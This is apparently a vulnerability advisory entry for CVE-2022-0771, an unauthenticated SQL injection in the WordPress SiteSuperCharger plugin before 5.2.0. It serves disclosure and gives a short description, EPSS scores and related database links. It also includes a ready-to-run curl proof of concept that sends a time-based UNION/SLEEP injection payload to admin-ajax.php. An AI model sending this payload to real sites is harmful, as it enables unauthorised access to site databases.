Lucene search
CydaveWPEX-ID:6139E732-88F2-42CB-9DC3-42AD49731E75HistoryApr 11, 2022 - 12:00 a.m.
SiteSuperCharger < 5.2.0 - Unauthenticated SQLi
2022-04-1100:00:00
cydave
77
sitesupercharger
unauthenticated
sql injection
EPSS
0.002
Percentile
57.6%
The plugin does not validate, sanitise and escape various user inputs before using them in SQL statements via AJAX actions (available to both unauthenticated and authenticated users), leading to Unauthenticated SQL Injections
curl https://example.com/wp-admin/admin-ajax.php --data '0=images+UNION+SELECT+1+from+wp_users+WHERE+1+%3d+(SELECT+SLEEP(1))+--+&1=.&action=processGroup'Related
patchstack
patchstack
wpvulndb
wpvulndb
SiteSuperCharger < 5.2.0 - Unauthenticated SQLi
2022-04-11 00:00:00
cvelist
cvelist
CVE-2022-0771 SiteSuperCharger < 5.2.0 - Unauthenticated SQLi
2022-05-02 16:05:41
cnvd
cnvd
WordPress SiteSuperCharger plugin SQL注入漏洞
2022-05-07 00:00:00
nvd
nvd
CVE-2022-0771
2022-05-02 16:15:08
cve
cve
CVE-2022-0771
2022-05-02 16:15:08
prion
prion
Sql injection
2022-05-02 16:15:00